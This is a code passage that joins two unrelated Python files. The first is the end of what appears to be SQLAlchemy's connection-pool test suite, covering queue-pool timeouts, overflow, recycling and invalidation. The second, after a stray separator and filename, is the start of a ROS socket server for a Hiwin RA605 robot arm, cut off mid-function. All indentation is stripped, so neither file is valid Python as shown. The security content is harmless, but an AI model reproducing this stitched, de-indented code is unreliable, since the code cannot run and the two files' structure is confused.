creator=MockDBAPI().connect, pool_size=1, max_overflow=0
)
event.listen(p1, "connect", listen_one)
event.listen(p1, "connect", listen_two)
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.invalidate()
conn.close()
fail = True
assert_raises(Exception, p1.connect)
fail = False
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.close()
def teardown_test(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
"""test for :ticket:`2964`, where the pool would not mutex the
initialization of the dialect.
Unfortunately, as discussed in :ticket:`6337`, this test suite did not
ensure that the ``Engine`` itself actually uses the "first_connect" event,
so when :ticket:`5497` came along, the "first_connect" event was no longer
used and no test detected the re-introduction of the exact same race
condition, which was now worse as the un-initialized dialect would now
pollute the SQL cache causing the application to not work at all.
A new suite has therefore been added in test/engine/test_execute.py->
OnConnectTest::test_initialize_connect_race to ensure that the engine
in total synchronizes the "first_connect" process, which now works
using a new events feature _exec_w_sync_on_first_run.
"""
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, "first_connect")
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, "connect")
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(0.02)
c1.close()
time.sleep(0.02)
threads = []
# what we're trying to do here is have concurrent use of
# all three pooled connections at once, and the thing we want
# to test is that first_connect() finishes completely before
# any of the connections get returned. so first_connect()
# sleeps for one second, then pings the mock. the threads should
# not have made it to the "checkout() event for that one second.
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
# there is a very unlikely condition observed in CI on windows
# where even though we have five threads above all calling upon the
# pool, we didn't get concurrent use of all three connections, two
# connections were enough. so here we purposely just check out
# all three at once just to get a consistent test result.
make_sure_all_three_are_connected = [pool.connect() for i in range(3)]
for conn in make_sure_all_three_are_connected:
conn.close()
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect(),
],
)
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
eq_(status(p), (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.timing_intensive
def test_timeout_subsecond_precision(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0, timeout=0.5)
c1 = p.connect() # noqa
with expect_raises(tsa.exc.TimeoutError):
now = time.time()
c2 = p.connect() # noqa
# Python timing is not very accurate, the time diff should be very
# close to 0.5s but we give 200ms of slack.
assert 0.3 <= time.time() - now <= 0.7, "Pool timeout not respected"
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
        # timeout again within the mutex, and if it has expired, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
            # normally, the timeout should be under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
reaper = testing.engines.ConnectionKiller()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
reaper.add_pool(p)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
reaper.assert_all_closed()
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
with mutex:
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
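        # as a set, the close counts below collapse to {0, 1}: the two pooled
        # connections are still open (0), every overflow connection was closed (1).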
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
c3 = p.connect()
is_not(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises_context_ok(Exception, p.connect)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, recycle=1
)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
)
@testing.requires.timing_intensive
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info["x"] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert "x" in conn_rec.info
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.combinations((True, testing.requires.python3), (False,))
def test_userspace_disconnectionerror_weakref_finalizer(self, detach_gced):
dbapi, pool = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, _is_asyncio=detach_gced
)
if detach_gced:
pool._dialect.is_async = True
@event.listens_for(pool, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if getattr(dbapi_con, "boom") == "yes":
raise tsa.exc.DisconnectionError()
conn = pool.connect()
old_dbapi_conn = conn.connection
conn.close()
eq_(old_dbapi_conn.mock_calls, [call.rollback()])
old_dbapi_conn.boom = "yes"
conn = pool.connect()
dbapi_conn = conn.connection
del conn
gc_collect()
if detach_gced:
# new connection was detached + abandoned on return
eq_(dbapi_conn.mock_calls, [])
else:
# new connection reset and returned to pool
eq_(dbapi_conn.mock_calls, [call.rollback()])
# old connection was just closed - did not get an
# erroneous reset on return
eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(0.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {}, Mock(), Mock()
)
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn,))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(
reset_on_return=None, pool_size=1, max_overflow=0
)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_no_double_checkin(self):
p = self._queuepool_fixture(pool_size=1)
c1 = p.connect()
rec = c1._connection_record
c1.close()
assert_raises_message(
Warning, "Double checkin attempted on %s" % rec, rec.checkin
)
def test_lifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator, use_lifo=True)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
for i in range(5):
pc1 = p.connect()
is_(pc1.connection, c3)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c3)
pc2 = p.connect()
is_(pc2.connection, c2)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c1)
pc2.close()
pc3.close()
pc1.close()
def test_fifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
pc1 = p.connect()
is_(pc1.connection, c1)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c1)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3.close()
pc1.close()
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
# TODO: the SingletonThreadPool cleanup method
# has an unfixed race condition within the "cleanup" system that
# leads to this test being off by one connection under load; in any
# case, this connection will be closed once it is garbage collected.
# this pool is not a production-level pool and is only used for the
# SQLite "memory" connection, and is not very useful under actual
# multi-threaded conditions
# @testing.requires.threading_with_mock
# def test_cleanup_no_gc(self):
# self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(0.01)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
lp = len(p._all_conns)
is_true(3 <= lp <= 4)
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
def test_no_rollback_from_nested_connections(self):
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
c1 = p.connect()
mock_conn = c1.connection
c2 = p.connect()
is_(c1, c2)
c2.close()
eq_(mock_conn.mock_calls, [])
c1.close()
eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[call("foo.db"), call("foo.db")], any_order=True
)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
def test_connect(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
c1 = p.connect()
conn = c1.connection
c1.close()
c2 = p.connect()
is_(conn, c2.connection)
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
HiwinRA605_socket_ros_test_20190626114016.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy PC and send them to the control PC over a socket
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
Socket = 0
data = '0' # initial value of the data to transmit
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # was "raise StopIteration"; PEP 479 turns that into a RuntimeError inside a generator on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
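# Usage sketch for the switch recipe above (this is how Socket_command and
# socket_client use it below):
#
#     for case in switch(socket_cmd.action):
#         if case(Taskcmd.Action_Type.PtoP):
#             ...   # handle point-to-point motion
#             break
#         if case():        # no argument: default branch, always matches
#             break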
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(req): ## receive pose data sent from the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
